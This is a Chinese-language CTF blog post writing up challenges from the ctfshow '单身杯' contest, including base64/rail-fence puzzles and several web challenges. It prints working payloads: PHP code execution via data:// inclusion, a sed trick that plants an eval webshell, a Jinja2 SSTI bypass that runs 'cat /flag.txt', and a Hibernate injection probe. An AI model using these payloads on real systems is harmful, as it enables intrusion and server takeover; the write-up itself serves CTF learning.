<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.0.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"n9-zqc.github.io","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.json"};
  </script>

  <meta name="description" content="这个比赛做出了一道web题">
<meta property="og:type" content="article">
<meta property="og:title" content="单身杯">
<meta property="og:url" content="https://n9-zqc.github.io/2022/05/22/%E5%8D%95%E8%BA%AB%E6%9D%AF/index.html">
<meta property="og:site_name" content="N9-zqc">
<meta property="og:description" content="这个比赛做出了一道web题">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2022-05-22T15:34:19.000Z">
<meta property="article:modified_time" content="2022-05-22T15:36:35.677Z">
<meta property="article:author" content="N9-zqc">
<meta property="article:tag" content="5&#x2F;20打的比赛">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://n9-zqc.github.io/2022/05/22/%E5%8D%95%E8%BA%AB%E6%9D%AF/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>单身杯 | N9-zqc</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">N9-zqc</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">有关网络安全的学习笔记</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-文章">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>文章</a>

  </li>
        <li class="menu-item menu-item-标签">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-分类">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-查找">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>查找</a>

  </li>
        <li class="menu-item menu-item-关于">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="https://n9-zqc.github.io/2022/05/22/%E5%8D%95%E8%BA%AB%E6%9D%AF/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="N9-zqc">
      <meta itemprop="description" content="主要有关ctf的学习笔记,主攻逆向和Web">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="N9-zqc">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          单身杯
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>
              

              <time title="Created: 2022-05-22 23:34:19 / Modified: 23:36:35" itemprop="dateCreated datePublished" datetime="2022-05-22T23:34:19+08:00">2022-05-22</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/ctf%E6%AF%94%E8%B5%9B/" itemprop="url" rel="index"><span itemprop="name">ctf比赛</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="Views" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">Views: </span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>这个比赛做出了一道web题</p>
<span id="more"></span>

<h4 id="re签到"><a href="#re签到" class="headerlink" title="re签到"></a>re签到</h4><p>ida查看字符串，base64</p>
<p>dsb_re_sign_in_hsssssssss</p>
<h4 id="任性老板"><a href="#任性老板" class="headerlink" title="任性老板"></a>任性老板</h4><p>搜索本店只卖一种面可以找到，美团搜索即可得到电话号码。</p>
<p>ctfshow{左撇子私房面_15882424927}</p>
<h4 id="古典base"><a href="#古典base" class="headerlink" title="古典base"></a>古典base</h4><p>The flag is:YcdYZZNLMYNOZNYC323WWSTTDjyDjTjgRhsUV1UQAB0lMUl=mv41ihwxth5my59=</p>
<p>栅栏密码：密钥4解密</p>
<p>Y3Rmc2hvd3s4YWU1ZWViZS1hNTUwLTQxMDAtYjBhNy05ODlmZjMyNTU5Yjl9Cg==</p>
<p>再base64解密</p>
<p>ctfshow{8ae5eebe-a550-4100-b0a7-989ff32559b9}</p>
<h4 id="web签到"><a href="#web签到" class="headerlink" title="web签到"></a>web签到</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">file=data:text/plain,<span class="meta">&lt;?php</span> phpinfo();<span class="meta">?&gt;</span>&gt;?;)(ofniphp php?&lt;,nialp/txet:atad</span><br></pre></td></tr></table></figure>

<p>可以得到phpinfo();</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">file=data:text/plain,<span class="meta">&lt;?php</span> system(<span class="string">&quot;ls /&quot;</span>);<span class="meta">?&gt;</span>&gt;?;)<span class="string">&quot;/ sl&quot;</span>(metsys php?&lt;,nialp/txet:atad</span><br><span class="line"></span><br><span class="line">bin dev etc f1agaaa home lib media mnt opt proc root run sbin srv sys tmp usr <span class="keyword">var</span> &gt;?;)<span class="string">&quot;/ sl&quot;</span>(metsys php?&lt;,nialp/txet:atad</span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">file=data:text/plain,<span class="meta">&lt;?php</span> system(<span class="string">&quot;cat /f1agaaa&quot;</span>);<span class="meta">?&gt;</span>&gt;?;)<span class="string">&quot;aaaga1f/ tac&quot;</span>(metsys php?&lt;,nialp/txet:atad</span><br><span class="line">ctfshow&#123;<span class="number">7</span>f45081d-<span class="number">6109</span>-<span class="number">4</span>c10-<span class="number">80</span>f1-<span class="number">3</span>a576b4b82ef&#125; &gt;?;)<span class="string">&quot;aaaga1f/ tac&quot;</span>(metsys php?&lt;,nialp/txet:atad</span><br></pre></td></tr></table></figure>

<p>复现</p>
<h4 id="easyPHP"><a href="#easyPHP" class="headerlink" title="easyPHP"></a>easyPHP</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"></span><br><span class="line"><span class="variable">$cmd</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;cmd&#x27;</span>];</span><br><span class="line"><span class="variable">$param</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;param&#x27;</span>];</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$cmd</span>) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$param</span>))&#123;</span><br><span class="line">  <span class="variable">$cmd</span>=escapeshellcmd(substr(<span class="variable">$cmd</span>,<span class="number">0</span>,<span class="number">3</span>)).<span class="string">&quot; &quot;</span>.escapeshellarg(<span class="variable">$param</span>).<span class="string">&quot; &quot;</span>.<span class="keyword">__FILE__</span>;</span><br><span class="line">  shell_exec(<span class="variable">$cmd</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span>.cmd=sed&amp;param=/php\|POST\|exec/!dw1.php</span><br><span class="line">在<span class="number">1</span>.php的url中</span><br><span class="line"><span class="number">2</span>.cmd=<span class="keyword">echo</span> <span class="string">&quot;&lt;?php eval(\$_POST[1]);?&gt;&quot;</span>&gt;<span class="number">2</span>.php</span><br><span class="line">post提交</span><br><span class="line"><span class="number">1</span>=system(<span class="string">&#x27;cat ./../../../../f1agaaa &#x27;</span>);</span><br></pre></td></tr></table></figure>

<h4 id="姻缘测试"><a href="#姻缘测试" class="headerlink" title="姻缘测试"></a>姻缘测试</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">is_hacker</span>(<span class="params">string</span>):</span> </span><br><span class="line">    <span class="string">&quot;&quot;&quot;整那些个花里胡哨的waf有啥用，还不如这一个，直接杜绝SSTI&quot;&quot;&quot;</span> </span><br><span class="line">    <span class="keyword">if</span> <span class="string">&quot;&#123;&quot;</span> <span class="keyword">in</span> string <span class="keyword">and</span> <span class="string">&quot;&#125;&quot;</span> <span class="keyword">in</span> string : </span><br><span class="line">        <span class="keyword">return</span> <span class="literal">True</span> </span><br><span class="line">    <span class="keyword">else</span>: </span><br><span class="line">        <span class="keyword">return</span> <span class="literal">False</span></span><br></pre></td></tr></table></figure>

<p>这里用了and，分开执行即可绕过,直接输入a和b可以得到</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">payload:</span><br><span class="line">&lt;<span class="keyword">object</span>&gt; &lt;<span class="class"><span class="keyword">class</span> &#x27;<span class="title">_frozen_importlib</span>.<span class="title">_DummyModuleLock</span>&#x27;&gt;</span></span><br><span class="line"><span class="class"><span class="title">result</span>?<span class="title">boy_name</span>=</span>&#123;&#123;%<span class="number">27</span>&amp;girl_name=%<span class="number">27</span>.<span class="keyword">__class__</span>.__base__.__subclasses__()[<span class="number">81</span>].__init__.__globals__.__import__(%<span class="number">27</span>os%<span class="number">27</span>).popen(%<span class="number">27</span>cat /flag.txt%<span class="number">27</span>).read()&#125;&#125;</span><br></pre></td></tr></table></figure>

<h4 id="blog"><a href="#blog" class="headerlink" title="blog"></a>blog</h4><p>登陆页面插入单引号可以引发错误</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Request processing failed; nested exception is java.lang.IllegalArgumentException: org.hibernate.QueryException: expecting &#x27;&#x27;&#x27;, found &#x27;&lt;EOF&gt;&#x27; [from com.ctfshow.dao.UserEntity where username = &#x27;a&#x27;&#x27; order by id]</span><br></pre></td></tr></table></figure>

<p>这里使用了hibernate框架，那么直接就IOC把id给注入进去看看能否成功</p>
<p>post提交</p>
<p>username=abc&amp;password=abc&amp;id=1</p>
<p>得到isAdmin: </p>
<p>后面就不会复现了</p>
<h5 id><a href="#" class="headerlink" title></a></h5>
    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/5-20%E6%89%93%E7%9A%84%E6%AF%94%E8%B5%9B/" rel="tag"># 5/20打的比赛</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/05/22/2022DASCTF%E5%87%BA%E9%A2%98%E4%BA%BA%E6%8C%91%E6%88%98%E8%B5%9B/" rel="prev" title="2022DASCTF出题人挑战赛">
      <i class="fa fa-chevron-left"></i> 2022DASCTF出题人挑战赛
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/05/28/buuoj%E7%AC%AC%E4%B8%80%E9%A1%B5Web%E9%A2%98/" rel="next" title="buuoj第一页Web题">
      buuoj第一页Web题 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#re%E7%AD%BE%E5%88%B0"><span class="nav-number">1.</span> <span class="nav-text">re签到</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BB%BB%E6%80%A7%E8%80%81%E6%9D%BF"><span class="nav-number">2.</span> <span class="nav-text">任性老板</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8F%A4%E5%85%B8base"><span class="nav-number">3.</span> <span class="nav-text">古典base</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#web%E7%AD%BE%E5%88%B0"><span class="nav-number">4.</span> <span class="nav-text">web签到</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#easyPHP"><span class="nav-number">5.</span> <span class="nav-text">easyPHP</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%A7%BB%E7%BC%98%E6%B5%8B%E8%AF%95"><span class="nav-number">6.</span> <span class="nav-text">姻缘测试</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#blog"><span class="nav-number">7.</span> <span class="nav-text">blog</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link"><span class="nav-number">7.1.</span> <span class="nav-text"></span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="N9-zqc"
      src="/images/avatar.gif">
  <p class="site-author-name" itemprop="name">N9-zqc</p>
  <div class="site-description" itemprop="description">主要有关ctf的学习笔记,主攻逆向和Web</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives">
          <span class="site-state-item-count">22</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
        <span class="site-state-item-count">21</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">N9-zqc</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a>
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="Total Visitors">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="Total Views">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
